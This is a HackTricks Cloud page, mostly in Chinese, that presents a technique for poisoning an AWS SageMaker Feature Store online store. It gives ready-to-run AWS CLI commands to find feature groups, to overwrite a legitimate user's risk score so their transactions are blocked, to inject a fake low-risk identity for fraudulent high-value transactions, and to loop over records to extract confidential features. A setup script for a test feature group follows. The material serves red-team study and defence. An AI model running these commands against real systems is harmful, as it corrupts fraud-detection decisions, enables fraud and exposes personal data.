SageMaker Feature Store online store poisoning

Tip

学习并练习 AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
学习并练习 GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
学习并练习 Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

支持 HackTricks

查看 subscription plans!

加入 💬 Discord group 或者 telegram group 或关注我们的 Twitter 🐦 @hacktricks_live.

通过向 HackTricks 和 HackTricks Cloud github 仓库提交 PRs 来分享 hacking tricks。

滥用 sagemaker:PutRecord 在启用 OnlineStore 的 Feature Group 上覆盖由实时推理使用的实时特征值。结合 sagemaker:GetRecord，攻击者可以读取敏感特征。这不需要访问模型或端点。

要求

权限：sagemaker:ListFeatureGroups, sagemaker:DescribeFeatureGroup, sagemaker:PutRecord, sagemaker:GetRecord
目标：启用 OnlineStore 的 Feature Group（通常用于支持实时推理）
复杂度：低 - 简单的 AWS CLI 命令，不需要对模型进行任何操作

步骤

侦察

列出启用 OnlineStore 的 Feature Group

REGION=${REGION:-us-east-1}
aws sagemaker list-feature-groups \
--region $REGION \
--query "FeatureGroupSummaries[?OnlineStoreConfig!=null].[FeatureGroupName,CreationTime]" \
--output table

描述目标 Feature Group 以了解其模式

FG=<feature-group-name>
aws sagemaker describe-feature-group \
--region $REGION \
--feature-group-name "$FG"

注意 RecordIdentifierFeatureName、EventTimeFeatureName 和所有特征定义。这些是构造有效记录所必需的。

Attack Scenario 1: Data Poisoning (覆盖现有记录)

读取当前合法记录

aws sagemaker-featurestore-runtime get-record \
--region $REGION \
--feature-group-name "$FG" \
--record-identifier-value-as-string user-001

使用内联 --record 参数用恶意值污染记录

NOW=$(date -u +%Y-%m-%dT%H:%M:%SZ)

# Example: Change risk_score from 0.15 to 0.99 to block a legitimate user
aws sagemaker-featurestore-runtime put-record \
--region $REGION \
--feature-group-name "$FG" \
--record "[
{\"FeatureName\": \"entity_id\", \"ValueAsString\": \"user-001\"},
{\"FeatureName\": \"event_time\", \"ValueAsString\": \"$NOW\"},
{\"FeatureName\": \"risk_score\", \"ValueAsString\": \"0.99\"},
{\"FeatureName\": \"transaction_amount\", \"ValueAsString\": \"125.50\"},
{\"FeatureName\": \"account_status\", \"ValueAsString\": \"POISONED\"}
]" \
--target-stores OnlineStore

验证 poisoned data

aws sagemaker-featurestore-runtime get-record \
--region $REGION \
--feature-group-name "$FG" \
--record-identifier-value-as-string user-001

影响: 机器学习模型在使用此特征时现在会看到 risk_score=0.99 对于一个合法用户，可能会阻止他们的交易或服务。

攻击场景 2：恶意数据注入（创建伪造记录）

注入完全新的记录，并操纵其特征以规避安全控制：

NOW=$(date -u +%Y-%m-%dT%H:%M:%SZ)

# Create fake user with artificially low risk to perform fraudulent transactions
aws sagemaker-featurestore-runtime put-record \
--region $REGION \
--feature-group-name "$FG" \
--record "[
{\"FeatureName\": \"entity_id\", \"ValueAsString\": \"user-999\"},
{\"FeatureName\": \"event_time\", \"ValueAsString\": \"$NOW\"},
{\"FeatureName\": \"risk_score\", \"ValueAsString\": \"0.01\"},
{\"FeatureName\": \"transaction_amount\", \"ValueAsString\": \"999999.99\"},
{\"FeatureName\": \"account_status\", \"ValueAsString\": \"approved\"}
]" \
--target-stores OnlineStore

验证 injection:

aws sagemaker-featurestore-runtime get-record \
--region $REGION \
--feature-group-name "$FG" \
--record-identifier-value-as-string user-999

影响：Attacker 创建了一个风险得分很低（0.01）的虚假身份，能够在不触发欺诈检测的情况下执行高价值的欺诈交易。

攻击场景 3：敏感数据外泄

读取多条记录以提取机密特征并分析模型行为：

# Exfiltrate data for known users
for USER_ID in user-001 user-002 user-003 user-999; do
echo "Exfiltrating data for ${USER_ID}:"
aws sagemaker-featurestore-runtime get-record \
--region $REGION \
--feature-group-name "$FG" \
--record-identifier-value-as-string ${USER_ID}
done

影响: 机密特征（风险评分、交易模式、个人数据）暴露给攻击者。

测试/演示 Feature Group 创建（可选）

如果你需要创建一个测试 Feature Group:

REGION=${REGION:-us-east-1}
FG=$(aws sagemaker list-feature-groups --region $REGION --query "FeatureGroupSummaries[?OnlineStoreConfig!=null]|[0].FeatureGroupName" --output text)
if [ -z "$FG" -o "$FG" = "None" ]; then
ACC=$(aws sts get-caller-identity --query Account --output text)
FG=test-fg-$ACC-$(date +%s)
ROLE_ARN=$(aws iam get-role --role-name AmazonSageMaker-ExecutionRole --query Role.Arn --output text 2>/dev/null || echo arn:aws:iam::$ACC:role/service-role/AmazonSageMaker-ExecutionRole)

aws sagemaker create-feature-group \
--region $REGION \
--feature-group-name "$FG" \
--record-identifier-feature-name entity_id \
--event-time-feature-name event_time \
--feature-definitions "[
{\"FeatureName\":\"entity_id\",\"FeatureType\":\"String\"},
{\"FeatureName\":\"event_time\",\"FeatureType\":\"String\"},
{\"FeatureName\":\"risk_score\",\"FeatureType\":\"Fractional\"},
{\"FeatureName\":\"transaction_amount\",\"FeatureType\":\"Fractional\"},
{\"FeatureName\":\"account_status\",\"FeatureType\":\"String\"}
]" \
--online-store-config "{\"EnableOnlineStore\":true}" \
--role-arn "$ROLE_ARN"

echo "Waiting for feature group to be in Created state..."
for i in $(seq 1 40); do
ST=$(aws sagemaker describe-feature-group --region $REGION --feature-group-name "$FG" --query FeatureGroupStatus --output text || true)
echo "$ST"; [ "$ST" = "Created" ] && break; sleep 15
done
fi

echo "Feature Group ready: $FG"

参考资料

Tip

学习并练习 AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
学习并练习 GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
学习并练习 Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

支持 HackTricks

查看 subscription plans!

加入 💬 Discord group 或者 telegram group 或关注我们的 Twitter 🐦 @hacktricks_live.

通过向 HackTricks 和 HackTricks Cloud github 仓库提交 PRs 来分享 hacking tricks。